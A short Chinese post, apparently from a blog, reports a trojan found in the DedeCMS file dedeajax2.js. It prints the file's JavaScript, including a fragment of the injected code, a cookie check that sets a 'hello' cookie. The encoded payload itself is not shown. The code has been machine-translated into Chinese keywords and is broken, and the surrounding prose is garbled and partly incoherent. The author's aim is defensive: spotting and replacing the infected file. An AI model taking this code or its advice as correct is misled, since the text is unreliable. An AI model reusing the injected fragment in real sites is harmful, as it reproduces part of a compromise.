Dedecms：dedeajax2.js植入木马的JS

点评：我的一个网站被植入木马，dede的程序。我升级到IE7补丁，为了检查马做准备工作，哈哈，原来dedeajax2.js植入木马

我的一个网站被植入木马，dede的程序。我升级到IE7补丁，为了检查马做准备工作，哈哈，发现dedeajax2.js植入木马的源代码如下：

/ /初始化文档
功能initxdom（）{
如果（dedexdom！= null）返回；
var obj = null；
如果（typeof（domparser）！=未定义）
VaR解析器=新DOMParser（）；
obj = parser.parsefromstring（XMLTEXT，文本 / XML）；
{其他}
尝试{ obj =新的ActiveX对象（MSXML2. DOMDocument ）；} catch（e）{ }
如果（obj = = null）{ try obj =新的ActiveX对象（微软。XMLDOM ）；抓（e）{ } }
}
dedexdom = obj；
}；
以下是 /被植入木马病毒，都是乱码通过Unicode编码处理。现在的人越来越狡猾
如果（document.cookie.indexof（你好）= = 1）{ var到期=新的日期（）；expires.settime（expires.gettime（）24×60×60×1000）；文档。饼干=你好=是的；文档。饼干=你好=是的；expires.settime；（}（}）；}

它可以覆盖着dedeajax2原始版本。这个文件，dede模板使用，搜索，没有发现使用。

但是，建议您多关注dedecms官方补丁。UNIX服务器不能将所有的文件，虽然Dede在UNIX服务器太麻烦。

关键词描述：如果新的木马 / /零var obj的植入